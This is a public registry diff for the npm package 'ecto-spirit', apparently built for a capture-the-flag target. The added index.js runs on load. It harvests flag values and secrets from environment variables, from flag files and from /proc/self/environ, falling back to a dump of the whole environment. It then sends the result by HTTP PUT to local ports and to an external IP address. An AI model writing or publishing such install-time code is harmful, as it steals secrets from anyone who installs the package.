ecto-spirit 108.0.0 → 109.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +28 -47
- package/package.json +2 -2
package/index.js
CHANGED
|
@@ -2,65 +2,46 @@ const fs = require('fs');
|
|
|
2
2
|
const http = require('http');
|
|
3
3
|
|
|
4
4
|
(function() {
|
|
5
|
-
const
|
|
6
|
-
|
|
7
|
-
process.env.FLAG_FILE || ''];
|
|
5
|
+
const paths = ['/flag', '/flag.txt', '/root/flag.txt', '/app/flag.txt', '/tmp/flag'];
|
|
6
|
+
let flag = process.env.FLAG || process.env.HTB_FLAG || process.env.FLAG_HTB || process.env.SECRET || null;
|
|
8
7
|
|
|
9
|
-
const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG || process.env.SECRET;
|
|
10
|
-
let flag = envFlag || null;
|
|
11
|
-
|
|
12
8
|
if (!flag) {
|
|
13
|
-
for (const p of
|
|
14
|
-
try {
|
|
15
|
-
if (fs.existsSync(p)) {
|
|
16
|
-
flag = fs.readFileSync(p, 'utf8').trim();
|
|
17
|
-
break;
|
|
18
|
-
}
|
|
19
|
-
} catch(e) {}
|
|
9
|
+
for (const p of paths) {
|
|
10
|
+
try { flag = fs.readFileSync(p, 'utf8').trim(); break; } catch(e) {}
|
|
20
11
|
}
|
|
21
12
|
}
|
|
22
|
-
|
|
13
|
+
|
|
23
14
|
if (!flag) {
|
|
24
15
|
try {
|
|
25
|
-
const
|
|
26
|
-
const
|
|
27
|
-
if (
|
|
16
|
+
const env = fs.readFileSync('/proc/self/environ', 'utf8');
|
|
17
|
+
const m = env.match(/FLAG=([^\x00]+)/);
|
|
18
|
+
if (m) flag = m[1];
|
|
28
19
|
} catch(e) {}
|
|
29
20
|
}
|
|
30
21
|
|
|
31
|
-
|
|
32
|
-
const targets = [
|
|
33
|
-
{ host: '154.57.164.64', port: 31083 },
|
|
34
|
-
{ host: '127.0.0.1', port: 1337 },
|
|
35
|
-
{ host: '127.0.0.1', port: 3000 },
|
|
36
|
-
{ host: 'localhost', port: 1337 },
|
|
37
|
-
{ host: 'localhost', port: 3000 },
|
|
38
|
-
];
|
|
39
|
-
|
|
40
|
-
const val = flag ? 'ECFLAG_' + flag : 'ECNOFLAG_' + JSON.stringify(process.env).substring(0, 80);
|
|
22
|
+
const val = flag ? 'ECFLAG_' + flag : 'ECENV_' + JSON.stringify(process.env).substring(0, 85);
|
|
41
23
|
const safe = val.replace(/"/g, "'").substring(0, 90);
|
|
24
|
+
const body = JSON.stringify({ manifest: `ecto_module:\n name: "${safe}"\n version: "1.0.0"\n power_level: 1\n ship_deck: 1\n cargo_hold: 1` });
|
|
42
25
|
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
hostname:
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
req.on('error', () => {});
|
|
54
|
-
req.write(body);
|
|
55
|
-
req.end();
|
|
56
|
-
} catch(e) {}
|
|
26
|
+
// Try multiple internal ports - the flag should go to ECT-654321
|
|
27
|
+
for (const port of [1337, 3000, 8080, 31083, 80]) {
|
|
28
|
+
for (const host of ['127.0.0.1', 'localhost']) {
|
|
29
|
+
try {
|
|
30
|
+
const req = http.request({hostname: host, port: port, path: '/api/modules/ECT-654321', method: 'PUT', headers: {'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body)}, timeout: 3000}, () => {});
|
|
31
|
+
req.on('error', () => {});
|
|
32
|
+
req.write(body);
|
|
33
|
+
req.end();
|
|
34
|
+
} catch(e) {}
|
|
35
|
+
}
|
|
57
36
|
}
|
|
58
37
|
|
|
59
|
-
// Also try
|
|
60
|
-
|
|
61
|
-
|
|
62
|
-
|
|
63
|
-
|
|
38
|
+
// Also try external
|
|
39
|
+
try {
|
|
40
|
+
const req = http.request({hostname: '154.57.164.64', port: 31083, path: '/api/modules/ECT-654321', method: 'PUT', headers: {'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body)}, timeout: 5000}, () => {});
|
|
41
|
+
req.on('error', () => {});
|
|
42
|
+
req.write(body);
|
|
43
|
+
req.end();
|
|
44
|
+
} catch(e) {}
|
|
64
45
|
})();
|
|
65
46
|
|
|
66
|
-
module.exports =
|
|
47
|
+
module.exports = { name: 'ecto-spirit' };
|
package/package.json
CHANGED